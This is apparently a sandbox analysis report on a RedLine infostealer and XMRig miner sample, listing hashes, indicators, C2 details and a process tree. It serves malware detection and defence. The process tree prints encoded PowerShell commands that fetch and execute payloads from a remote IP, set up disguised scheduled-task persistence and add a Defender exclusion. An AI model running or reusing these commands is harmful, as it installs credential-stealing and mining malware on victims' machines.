redline | 6032d1538d68df2b8a118c6c5f3756a9c383d213f71fae50fef2c59482cdf107

Analysis

max time kernel
150s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
04-01-2023 18:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

35KB
MD5

763f596df92174f31b2019474d6a022c
SHA1

3716637d97d20f4c1a92631e78d363635e6d7bf4
SHA256

6032d1538d68df2b8a118c6c5f3756a9c383d213f71fae50fef2c59482cdf107
SHA512

fb38f1ec9105c753c56e8dbf1023fa84ccf61511ad15ef21db221890858b2aa1a33688dea0da894262f21bf2c3ef06bde92f3cbe95d4a6d601c4b5d0748e0e2d
SSDEEP

768:R0EzuhkxatcjJP1sgjy4r/wOPpdwMNhghy0qN:R0Ey6xatUNst4kmTghy0Y

Score

10^/10

redline xmrig $infostealer miner spyware

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://62.204.41.194/F1.exe

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.194/me.png

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.194/go.png

Extracted

Family

redline

Botnet

31.41.244.135:19850

Attributes

auth_value
66623f79e2af33286760f5dd6c4262dc

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 6 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/4724-172-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/4724-175-0x000000014036EAC4-mapping.dmp	xmrig
behavioral2/memory/4724-176-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/4724-177-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/4724-181-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/4724-192-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

4 4704 powershell.exe
5 4352 powershell.exe
6 2988 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

NoSleep.exeOneDrive.exe

pid process

2064 NoSleep.exe
1788 OneDrive.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

flow	pid	process
4	4704	powershell.exe
5	4352	powershell.exe
6	2988	powershell.exe

pid	process
2064	NoSleep.exe
1788	OneDrive.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.execonhost.exe

description	pid	process	target process
PID 4704 set thread context of 3068	4704	powershell.exe	RegSvcs.exe
PID 4008 set thread context of 4724	4008	conhost.exe	conhost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.execonhost.exepowershell.execonhost.execonhost.exeRegSvcs.exe

pid	process
4352	powershell.exe
5036	powershell.exe
2988	powershell.exe
4704	powershell.exe
2988	powershell.exe
5036	powershell.exe
4352	powershell.exe
4704	powershell.exe
5100	conhost.exe
400	powershell.exe
400	powershell.exe
4008	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
3068	RegSvcs.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
3068	RegSvcs.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

652

pid	process
652

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.execonhost.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4352	powershell.exe
Token: SeDebugPrivilege	5036	powershell.exe
Token: SeDebugPrivilege	2988	powershell.exe
Token: SeDebugPrivilege	4704	powershell.exe
Token: SeDebugPrivilege	5100	conhost.exe
Token: SeDebugPrivilege	400	powershell.exe
Token: SeIncreaseQuotaPrivilege	400	powershell.exe
Token: SeSecurityPrivilege	400	powershell.exe
Token: SeTakeOwnershipPrivilege	400	powershell.exe
Token: SeLoadDriverPrivilege	400	powershell.exe
Token: SeSystemProfilePrivilege	400	powershell.exe
Token: SeSystemtimePrivilege	400	powershell.exe
Token: SeProfSingleProcessPrivilege	400	powershell.exe
Token: SeIncBasePriorityPrivilege	400	powershell.exe
Token: SeCreatePagefilePrivilege	400	powershell.exe
Token: SeBackupPrivilege	400	powershell.exe
Token: SeRestorePrivilege	400	powershell.exe
Token: SeShutdownPrivilege	400	powershell.exe
Token: SeDebugPrivilege	400	powershell.exe
Token: SeSystemEnvironmentPrivilege	400	powershell.exe
Token: SeRemoteShutdownPrivilege	400	powershell.exe
Token: SeUndockPrivilege	400	powershell.exe
Token: SeManageVolumePrivilege	400	powershell.exe
Token: 33	400	powershell.exe
Token: 34	400	powershell.exe
Token: 35	400	powershell.exe
Token: 36	400	powershell.exe
Token: SeIncreaseQuotaPrivilege	400	powershell.exe
Token: SeSecurityPrivilege	400	powershell.exe
Token: SeTakeOwnershipPrivilege	400	powershell.exe
Token: SeLoadDriverPrivilege	400	powershell.exe
Token: SeSystemProfilePrivilege	400	powershell.exe
Token: SeSystemtimePrivilege	400	powershell.exe
Token: SeProfSingleProcessPrivilege	400	powershell.exe
Token: SeIncBasePriorityPrivilege	400	powershell.exe
Token: SeCreatePagefilePrivilege	400	powershell.exe
Token: SeBackupPrivilege	400	powershell.exe
Token: SeRestorePrivilege	400	powershell.exe
Token: SeShutdownPrivilege	400	powershell.exe
Token: SeDebugPrivilege	400	powershell.exe
Token: SeSystemEnvironmentPrivilege	400	powershell.exe
Token: SeRemoteShutdownPrivilege	400	powershell.exe
Token: SeUndockPrivilege	400	powershell.exe
Token: SeManageVolumePrivilege	400	powershell.exe
Token: 33	400	powershell.exe
Token: 34	400	powershell.exe
Token: 35	400	powershell.exe
Token: 36	400	powershell.exe
Token: SeIncreaseQuotaPrivilege	400	powershell.exe
Token: SeSecurityPrivilege	400	powershell.exe
Token: SeTakeOwnershipPrivilege	400	powershell.exe
Token: SeLoadDriverPrivilege	400	powershell.exe
Token: SeSystemProfilePrivilege	400	powershell.exe
Token: SeSystemtimePrivilege	400	powershell.exe
Token: SeProfSingleProcessPrivilege	400	powershell.exe
Token: SeIncBasePriorityPrivilege	400	powershell.exe
Token: SeCreatePagefilePrivilege	400	powershell.exe
Token: SeBackupPrivilege	400	powershell.exe
Token: SeRestorePrivilege	400	powershell.exe
Token: SeShutdownPrivilege	400	powershell.exe
Token: SeDebugPrivilege	400	powershell.exe
Token: SeSystemEnvironmentPrivilege	400	powershell.exe
Token: SeRemoteShutdownPrivilege	400	powershell.exe
Token: SeUndockPrivilege	400	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

conhost.exe

pid	process
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

conhost.exe

pid	process
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe
4724	conhost.exe

Suspicious use of WriteProcessMemory 44 IoCs

Processes:

file.exepowershell.exeNoSleep.execonhost.exepowershell.exeOneDrive.execonhost.exe

description	pid	process	target process
PID 4332 wrote to memory of 2988	4332	file.exe	powershell.exe
PID 4332 wrote to memory of 2988	4332	file.exe	powershell.exe
PID 4332 wrote to memory of 4352	4332	file.exe	powershell.exe
PID 4332 wrote to memory of 4352	4332	file.exe	powershell.exe
PID 4332 wrote to memory of 4704	4332	file.exe	powershell.exe
PID 4332 wrote to memory of 4704	4332	file.exe	powershell.exe
PID 4332 wrote to memory of 5036	4332	file.exe	powershell.exe
PID 4332 wrote to memory of 5036	4332	file.exe	powershell.exe
PID 4352 wrote to memory of 2064	4352	powershell.exe	NoSleep.exe
PID 4352 wrote to memory of 2064	4352	powershell.exe	NoSleep.exe
PID 2064 wrote to memory of 5100	2064	NoSleep.exe	conhost.exe
PID 2064 wrote to memory of 5100	2064	NoSleep.exe	conhost.exe
PID 2064 wrote to memory of 5100	2064	NoSleep.exe	conhost.exe
PID 5100 wrote to memory of 400	5100	conhost.exe	powershell.exe
PID 5100 wrote to memory of 400	5100	conhost.exe	powershell.exe
PID 4704 wrote to memory of 3068	4704	powershell.exe	RegSvcs.exe
PID 4704 wrote to memory of 3068	4704	powershell.exe	RegSvcs.exe
PID 4704 wrote to memory of 3068	4704	powershell.exe	RegSvcs.exe
PID 4704 wrote to memory of 3068	4704	powershell.exe	RegSvcs.exe
PID 4704 wrote to memory of 3068	4704	powershell.exe	RegSvcs.exe
PID 4704 wrote to memory of 3068	4704	powershell.exe	RegSvcs.exe
PID 4704 wrote to memory of 3068	4704	powershell.exe	RegSvcs.exe
PID 4704 wrote to memory of 3068	4704	powershell.exe	RegSvcs.exe
PID 1788 wrote to memory of 4008	1788	OneDrive.exe	conhost.exe
PID 1788 wrote to memory of 4008	1788	OneDrive.exe	conhost.exe
PID 1788 wrote to memory of 4008	1788	OneDrive.exe	conhost.exe
PID 4008 wrote to memory of 3444	4008	conhost.exe	conhost.exe
PID 4008 wrote to memory of 3444	4008	conhost.exe	conhost.exe
PID 4008 wrote to memory of 3444	4008	conhost.exe	conhost.exe
PID 4008 wrote to memory of 4724	4008	conhost.exe	conhost.exe
PID 4008 wrote to memory of 4724	4008	conhost.exe	conhost.exe
PID 4008 wrote to memory of 4724	4008	conhost.exe	conhost.exe
PID 4008 wrote to memory of 4724	4008	conhost.exe	conhost.exe
PID 4008 wrote to memory of 4724	4008	conhost.exe	conhost.exe
PID 4008 wrote to memory of 4724	4008	conhost.exe	conhost.exe
PID 4008 wrote to memory of 4724	4008	conhost.exe	conhost.exe
PID 4008 wrote to memory of 4724	4008	conhost.exe	conhost.exe
PID 4008 wrote to memory of 4724	4008	conhost.exe	conhost.exe
PID 4008 wrote to memory of 4724	4008	conhost.exe	conhost.exe
PID 4008 wrote to memory of 4724	4008	conhost.exe	conhost.exe
PID 4008 wrote to memory of 4724	4008	conhost.exe	conhost.exe
PID 4008 wrote to memory of 4724	4008	conhost.exe	conhost.exe
PID 4008 wrote to memory of 4724	4008	conhost.exe	conhost.exe
PID 4008 wrote to memory of 4724	4008	conhost.exe	conhost.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBOAG8AUwBsAGUAZQBwAC4AZQB4AGUAIgANAAoAJABXAGUAYgBGAGkAbABlACAAPQAgACIAaAB0AHQAcAA6AC8ALwA2ADIALgAyADAANAAuADQAMQAuADEAOQA0AC8ARgAxAC4AZQB4AGUAIgANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAVwBlAGIARgBpAGwAZQAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4352

C:\Users\Admin\AppData\Roaming\NoSleep.exe
"C:\Users\Admin\AppData\Roaming\NoSleep.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2064

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\NoSleep.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAbABoAG4AIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAIgBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE8AbgBlAEQAcgBpAHYAZQBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlACIAJwApACAAPAAjAG0AeAAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATABvAGcATwBuACkAIAA8ACMAbQB0AHUAdAAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGwAdwAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAFEAQwAnACAAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAbgB3AHEAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABOAG8AUwBsAGUAZQBwAC4AZQB4AGUAJwAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE8AbgBlAEQAcgBpAHYAZQBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBlAHEAcwAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAdwBmAGkAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAnAFwAQQBwAHAARABhAHQAYQAnAA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBtAGUALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4704

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBnAG8ALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2988

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1788

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4008

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "cvxjxkjice"
3⤵
PID:3444

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe pjsnsurpv0 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZebSGUfj6Vuv+kPoPZ9FoidkTm/7TRz3Cxu5/LqhuwWCS2hvmHfyPTAWIo4zY5OcwjP+79VuJh5O5c9vMH8WB3WKocLPQQ3D/631f214VrDNh9z0jOLbJJ9YXALTSKeo3z0yqpo23wDcDd1T/hDfuDceoldVJQGMTDTCXN0Q0os5qQZpM/bbi7sbKmKkdCHj6mFIu02fq5LlHaQLCNyvHRzVgK320/ko7oR3JyhnmBQHtbZUpiFNPFJEf7lTC77qWxEJ3h4yjiCPgrTI6MoBbSgjAmpPlQgNd71RJ7lG0ikmSTeoT3CddgZH5TjpSuHbPN3ha82GVaI5+j+dJzAfNAaJfxYNDrhTxng1MpRAutdkSftro/iAbX8hcx7q/b7Qg7J3CyclBC4/Mwe/Jeo6Q9AKf6F7/3Yi99ifKM20LuEsFK/pU/n4DnNACnryf3RdME
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4724

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
Filesize
642B

MD5
0b4ce74a6163ae20974c8ba4fdd4f1fa

SHA1
3c645b8b4d9bd437e7f1f74c21304452245dba1c

SHA256
2267541e715084f5cda2c56fe4186d937b73a3bb8e31a5e87cdc351ab558d4e7

SHA512
d3dd26b2817f22f38acebe03f6487d01421dea27717ac352a03b1b4bfec990d80796458cf608aa25e932bb91cfeedd25d6ced51cf3e554fdc3a1164bc3e5805c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
042323759662130763b90102081537f5

SHA1
3cdbc496f7e7a1c512a808fbbe88e7f724b04153

SHA256
5820f07295975657fc430bb9a7e3f75849ac3b0def9b4edba24d5105e5eed61e

SHA512
6ee211d6264ab0ec505d6dbfb57d4778dce7818280c71dc6df58d2d051276242b6ea28615b7dd45f9dec0153b6d2aac5949aba1ee87f73f4bf1905f3e082070f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
042323759662130763b90102081537f5

SHA1
3cdbc496f7e7a1c512a808fbbe88e7f724b04153

SHA256
5820f07295975657fc430bb9a7e3f75849ac3b0def9b4edba24d5105e5eed61e

SHA512
6ee211d6264ab0ec505d6dbfb57d4778dce7818280c71dc6df58d2d051276242b6ea28615b7dd45f9dec0153b6d2aac5949aba1ee87f73f4bf1905f3e082070f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
f46c6d7890178bc06619e08a9686dac4

SHA1
29f31d2f66df72a8953560ea37e1eb88cdd972a3

SHA256
f538093c75c5f6c9db247c662eb7cb5b2a91b4560557f437f66f6f59d9f2ed8c

SHA512
7c2881177983df38e6075449ae99032dcd02f61657da36fc4cdbf49d3064562b54c52c4592d9616afcd106550b15e1bf496ebc12e5fc67e5d2c4f26a701ba350

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
d8c949cbbae4f47661010b352cdeb7ab

SHA1
a98dd11733de39b61a032c542aad32a866de3bab

SHA256
d436586316f4f34684ea345097373f5f1d8acd3048159050c86c267448d134a2

SHA512
6ce44f8132a50a360085ebb66155b0c3d512b1134d1d98371486c868100026c60a8a273f03022364c4bd21311c421b2c3a8860a0ee085c148fc071b36c22894a

Download Submit
C:\Users\Admin\AppData\Roaming\NoSleep.exe
Filesize
4.4MB

MD5
da256d1a520061b14d1cd013d99e84ff

SHA1
1aad91448144852bd1bf83dcb85bd14c6db160da

SHA256
feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

SHA512
8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

Download Submit
C:\Users\Admin\AppData\Roaming\NoSleep.exe
Filesize
4.4MB

MD5
da256d1a520061b14d1cd013d99e84ff

SHA1
1aad91448144852bd1bf83dcb85bd14c6db160da

SHA256
feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

SHA512
8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
Filesize
4.4MB

MD5
da256d1a520061b14d1cd013d99e84ff

SHA1
1aad91448144852bd1bf83dcb85bd14c6db160da

SHA256
feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

SHA512
8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
Filesize
4.4MB

MD5
da256d1a520061b14d1cd013d99e84ff

SHA1
1aad91448144852bd1bf83dcb85bd14c6db160da

SHA256
feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

SHA512
8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

Download Submit
memory/400-160-0x00007FFCFF2D0000-0x00007FFCFFD91000-memory.dmp

Filesize
10.8MB

Download
memory/400-154-0x00007FFCFF2D0000-0x00007FFCFFD91000-memory.dmp

Filesize
10.8MB

Download
memory/400-152-0x0000000000000000-mapping.dmp

Download
memory/2064-144-0x0000000000000000-mapping.dmp

Download
memory/2988-167-0x00007FFCFF2D0000-0x00007FFCFFD91000-memory.dmp

Filesize
10.8MB

Download
memory/2988-140-0x00007FFCFF2D0000-0x00007FFCFFD91000-memory.dmp

Filesize
10.8MB

Download
memory/2988-191-0x00007FFCFF2D0000-0x00007FFCFFD91000-memory.dmp

Filesize
10.8MB

Download
memory/2988-133-0x0000000000000000-mapping.dmp

Download
memory/3068-165-0x0000000004EE0000-0x0000000004EF2000-memory.dmp

Filesize
72KB

Download
memory/3068-166-0x0000000005010000-0x000000000511A000-memory.dmp

Filesize
1.0MB

Download
memory/3068-189-0x0000000007F20000-0x000000000844C000-memory.dmp

Filesize
5.2MB

Download
memory/3068-188-0x0000000007820000-0x00000000079E2000-memory.dmp

Filesize
1.8MB

Download
memory/3068-187-0x00000000068B0000-0x0000000006900000-memory.dmp

Filesize
320KB

Download
